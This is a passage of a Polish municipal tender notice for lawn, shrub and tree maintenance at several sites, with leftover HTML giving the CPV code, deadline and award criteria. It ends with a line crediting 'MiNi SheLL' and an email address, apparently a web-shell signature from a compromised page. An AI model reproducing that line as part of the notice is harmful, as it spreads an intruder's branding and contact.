2.	Nawożenie trawników  3 razy w sezonie.
3.	Jesienne koszenie i wygrabienie liści do całkowitego ich usunięcia.
4.	Pielęgnacja krzewów: odchwaszczanie, formowanie, podlewanie, nawożenie.
VI OŚRODEK ZDROWIA 
1.	Koszenie trawników (400 m2 )  8 razy w  uzgodnieniu z zamawiającym.
2.	Nawożenie trawników 3 razy w sezonie.
3.	Jesienne koszenie oraz wygrabienie liści do całkowitego ich usunięcia.
VII BOISKO SPORTOWE  przy ul. Leśnej
1.	Koszenie trawników (ok. 12 000 m2) na boisku sportowym (oprócz płyty do gry w piłkę nożną)wraz ze skarpami oraz od zewnętrznej strony ogrodzenia  6 razy w sezonie w uzgodnieniu z zamawiającym.
2.	Pielęgnacja krzewów i drzew lip pionowanie , mocowanie do palików. 

VIII INNE 
1.	Wykaszanie traw i usuwanie krzewów z pasów drogowych dróg gminnych na długości 5 000 mb i szerokości 1,00 mb jednostronnego wykaszania w miejscach wskazanych przez zamawiającego. 
2.	Nasadzenie drzewek w uzgodnieniu z zamawiającym  10 szt.
3.	Pielęgnacja drzewek  pionowanie, mocowanie do palików.
4.	W przypadku połamania lub kradzieży istniejących drzewek (lipa) przy cmentarzu, należy uzupełnić brakujące drzewka na koszt Wykonawcy.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77310000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/10/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Termin patności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com